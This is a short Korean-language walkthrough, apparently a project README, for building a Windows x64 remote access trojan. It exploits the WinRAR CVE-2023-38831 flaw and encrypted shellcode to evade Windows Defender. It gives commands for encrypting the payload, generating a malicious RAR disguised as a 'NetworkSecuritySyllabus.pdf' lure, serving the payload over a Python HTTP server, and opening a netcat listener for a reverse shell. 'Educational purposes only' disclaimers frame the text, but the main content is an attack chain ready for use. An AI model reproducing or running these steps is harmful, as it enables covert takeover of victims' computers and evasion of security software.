
Windows x64용 원격 접근 트로이 목마(RAT)로, CVE-2023-38831 취약점(WinRAR < 6.23 취약점)과 셸코드 익스플로잇 기술을 결합하여 사용합니다.
CVE-2023-38831(WinRAR < 6.23)과 쉘코드 악용을 사용하여 Windows Defender를 우회하는 Windows x64 RAT를 개발합니다.
경고: 이 정보는 교육 목적으로만 제공됩니다. 이 기술을 무단으로 사용하는 것은 불법이며 비윤리적입니다.
쉘코드 제작
51721.py를 사용하여 초기 쉘코드를 생성합니다.쉘코드 수정 및 컴파일
실행 파일 암호화
decrypt_file.ps1을 사용하여 컴파일된 실행 파일을 암호화합니다:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
WinRAR 아카이브 생성
cve-2023-38831-exp-gen.py를 사용하여 아카이브를 생성합니다:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
파일 다운로드를 위한 Python 서버 설정
enc_main.exe와 decrypt_file.ps1이 있는 디렉터리로 이동합니다.python3 -m http.server 8000
역방향 TCP 셸 수신 대기 준비
nc -lnvp 4444
역방향 TCP 셸 트리거
이 정보는 교육 목적으로만 제공됩니다. 명시적 허가 없이 이 취약점을 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.